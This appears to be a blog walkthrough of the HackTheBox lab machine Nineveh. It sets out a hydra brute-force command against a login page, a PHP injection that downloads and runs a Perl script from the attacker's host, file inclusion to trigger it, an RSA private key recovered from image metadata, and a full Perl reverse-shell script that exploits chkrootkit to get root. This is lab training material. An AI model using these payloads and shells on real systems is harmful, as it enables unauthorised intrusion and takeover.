Nineveh is a part of HackTheBox platform. This is an intermediate level challenge and you will have to think outside the box to root this machine.
Machine: Nineveh OS: Linux Target IP: 10.10.10.43
Lets begin by enumerating the services running in this box.
Since port 80 as well as 443 are open, I used dirb to enumerate through the directories and managed to get several pages but I would like to concentrate on those two:
https://10.10.10.43/db..This path also contained a phpliteadmin login page
https://10.10.10.43/department/login.php
Here is the department login page:
Using hydra we can brute-force this page as follows:
root@kali:~# hydra 10.10.10.43 -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!" -
You might be wondering how I discovered the username is admin.
Well the login page gave a hint. If you enter any other username its showing invalid username tag
but if you enter admin, the invalid password tag is displayed instead.This is a simple method to detect correct username.
Well the login page gave a hint. If you enter any other username its showing invalid username tag
but if you enter admin, the invalid password tag is displayed instead.This is a simple method to detect correct username.
The brute-force attack was successful and got the following credentials:
Username: admin
Password: 1q2w3e4r5t
I logged in using this credentials and I got this page
The other directory that interested me is the /db directory which prompted for a password
https://10.10.10.43/db
I brute-forced this using hydra and I managed to get admin password as password123
I logged in and I had a panel that allowed me to create database .
I created a new database with name “ninevehNotes.php“ and I noted it was stored in this the directory /var/tmp. This is the path we will use to execute the arbitrary command.
Now we can create a table and inject <?php system(“wget -O /tmp/shell.pl http://10.10.14.34:1234/shell.pl;perl /tmp/shell.pl”);> command in one of the fields.
Remember we had noticed http://10.10.10.43/department/login.php in our DIRB search.
Now we will use directory traversal in the page to trigger the payload and then use http:/10.10.10.43/department/manage.php?notes=ninevehNotes.php
I opened a netcat listener on port 80 using nc -nlvp 1234 to get the shell back from the victim
and that’s how I got a www-data shell.
Now we can try and escalate our privileges.
I did some enumeration on the system and found an image named nineveh.png in
/var/www/ssl/secure_notes.The following private key was embedded in the metadata.strings -n 8 nineveh.png
00000000000 13126060277 www-data www-data secret/nineveh.priv 00000003213 13126045656 www-data www-data — — -BEGIN RSA PRIVATE KEY — — - MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5 FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI 3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo 9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl 1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89 P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1 MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7 fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG — — -END RSA PRIVATE KEY — — - secret/nineveh.pub 00000000620 13126060277 www-data www-data ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb
I saved the RSA private key in the file id_rsa and transferred it to the victim using wget.I used netstat to check if the victim is listening for a SSH connection.
ssh -o StrictHostKeyChecking=no-i id_rsa amrois@nineveh.htb
I was successfully able to login as armois and was able to read user flag.
In amrois directory, I listed all the files as follows:
In the list we have a report owned by user amrois. Some reports were being generated which is an indication of possible cron jobs running in the system.
I did some research and discovered the output was generated by the chkrootkit command which is vulnerable.
I used a reverse shell script as follows to exploit chrootkit
#!/usr/bin/perl
use Socket;
$i=“10.10.14.34”;
$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));
if(connect(S,sockaddr_in($p,inet_aton($i))))
{
open(STDIN,“>&S”);
open(STDOUT,“>&S”);open(STDERR,“>&S”);exec(“/bin/sh -i”);
};
|
I listened for a reverse connection using netcat and got a root shell
Final thoughts:
I enjoyed injecting code using the database table since its not a very common approach. Also taking advantage of chkrootkit and the constantly generated reports made for an interesting root.
0 comments:
Post a Comment